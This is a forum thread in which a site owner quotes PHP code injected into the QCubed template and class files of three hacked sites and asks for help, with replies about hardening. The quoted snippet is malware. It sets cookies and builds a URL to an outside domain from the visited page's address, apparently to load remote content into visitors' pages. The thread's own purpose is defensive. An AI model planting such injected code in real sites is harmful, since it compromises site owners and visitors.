Sites Hacked --- Code found in most Qcubed. files
Hi.
Has anyone seen the code below injected into the top of the .tpl.php files and most of the .class files. Does anyone know what the code does. looks like it is stealing session variables, but for what purpose? We have had three sites that are using Qcubed that ended up with this code injected. Permissions on all of the files were 644 except those in the /forms directory which were 755.
We have changed the root password on all of the sites but they are located on a shared servers so we cannot change the actual server root password. Any help would be appreciated.
Thanks
David
global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "document.cookie='".$sessdt_k."=".$sessdt_f."';"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "document.cookie='".$sessdt_k."=".$sessdt_f."';"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo ""; echo "
Is your includes directory within the www root (or let's call it the 'HTDOCS') directory? If yes, move it out of the htdocs directory and update the qcubed.inc.php file. That will make sure that the site works while the includes are not put at risk of a leak!
Thanks Vaibhav
I will move my includes directory asap. I do have the configuration.inc file outside the www root on one of these sites.
In tracking the inserted changes, they occur in all of the gen files and I believe I may have found the file mapping insertion in the generated _class.paths.inc.php.
There was no inserted data in generated files that did not have a corresponding table in mysql (left there from tables that were deleted prior to a recent codegen). I two of the sites were very recently codegen'ed to add a few fields to the tables. The third may have been but I don't recall doing it. I am suspicious of the codegen.system that is on those servers.
I intend to move the cleaned files stuff to a local computer and run codegen to see if anything in injected. That will tell me if someone got to the qcubed files.
Thanks for the reminder to get my includes directory out of the public areas.
Dave